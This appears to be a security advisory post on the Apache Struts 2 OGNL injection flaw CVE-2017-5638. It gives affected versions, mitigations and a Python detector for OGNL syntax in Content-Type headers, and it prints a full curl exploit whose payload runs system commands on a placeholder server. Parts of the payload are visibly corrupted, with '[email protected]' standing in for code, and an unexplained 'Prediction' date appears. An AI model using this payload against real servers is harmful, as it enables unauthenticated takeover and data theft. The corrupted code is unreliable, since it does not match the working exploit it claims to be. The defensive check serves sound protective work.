How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent with an HTTP request to a Struts-based application. Improper exception handling during file upload attempts allows an attacker to inject Object-Graph Navigation Language (OGNL) expressions within the header. The framework incorrectly evaluates these expressions, leading to the execution of arbitrary system commands on the server with the application’s privileges. This provides a direct vector for complete server compromise without requiring authentication, making it a severe remote code execution vulnerability.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: 2017-03-20
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://vulnerable-server.com/struts2-showcase/fileupload/doUpload.action
How the Exploit Works:
The attacker crafts a malicious HTTP request whose `Content-Type` header is not a valid media type but contains an OGNL expression. The server-side multipart parser fails to handle the malformed header and raises an exception. During exception handling, the Struts framework evaluates the injected OGNL expression, executing the embedded system commands on the target server with the application’s privileges.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1 and apply the vendor patch immediately. Implement WAF rules that reject `Content-Type` headers carrying OGNL syntax instead of a media type. Isolate application servers from sensitive internal networks.
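A defender-side check for the two mitigations above, the vulnerable version ranges and inspection of the `Content-Type` header, written here as an added example; it is not code from the original post or from the Struts project, and the sample request lines and the `OGNL_PATTERN` heuristic are constructed assumptions rather than an official signature.

```python
import re
from typing import List, Tuple

# Assumed heuristic: a Content-Type header should hold a media type, never an
# OGNL expression opener ("%{" / "${"), an "@class@" static reference, or a
# Struts member-access token. Matching is done on the decoded header value.
OGNL_PATTERN = re.compile(
    r"%\{|\$\{|@[A-Za-z_][\w.]*@|#_memberAccess|ognl\.OgnlContext"
    r"|java\.lang\.(ProcessBuilder|Runtime)",
    re.IGNORECASE,
)

# Ranges from the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10 (inclusive).
VULNERABLE_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10))]


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '2.5' / '2.3.31' / '2.5.10.1' into a comparable integer tuple
    padded to at least three components so that '2.5' means 2.5.0."""
    parts = [int(p) for p in v.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable_version(v: str) -> bool:
    """True if the Struts version lies inside one of the advisory's ranges.
    Tuple comparison keeps 2.5.10.1 above 2.5.10, so the fixed release passes."""
    ver = parse_version(v)
    return any(lo <= ver <= hi for lo, hi in VULNERABLE_RANGES)


def is_suspicious_content_type(value: str) -> bool:
    """Flag a Content-Type value that carries OGNL syntax instead of a media type."""
    return bool(OGNL_PATTERN.search(value))


def scan_requests(lines: List[str]) -> List[str]:
    """Return the request lines whose Content-Type header looks like an injection attempt."""
    hits = []
    for line in lines:
        m = re.search(r"Content-Type:\s*(.*)", line, re.IGNORECASE)
        if m and is_suspicious_content_type(m.group(1)):
            hits.append(line)
    return hits


# Constructed sample request lines (not real traffic): one benign upload, one
# header that opens an OGNL expression, one unrelated request.
SAMPLE_LOG = [
    "POST /struts2-showcase/fileupload/doUpload.action Content-Type: multipart/form-data; boundary=----x",
    "POST /struts2-showcase/fileupload/doUpload.action Content-Type: %{(#_='multipart/form-data')}",
    "GET /index.action Content-Type: application/json",
]
```

Run `scan_requests(SAMPLE_LOG)` to get the single flagged line, and `is_vulnerable_version("2.5.10.1")` to confirm that the fixed release is outside the ranges.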
Impact:
Complete system compromise. Unauthorized remote code execution. Theft of sensitive data. Full control over the affected server. Potential pivot point into internal network.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode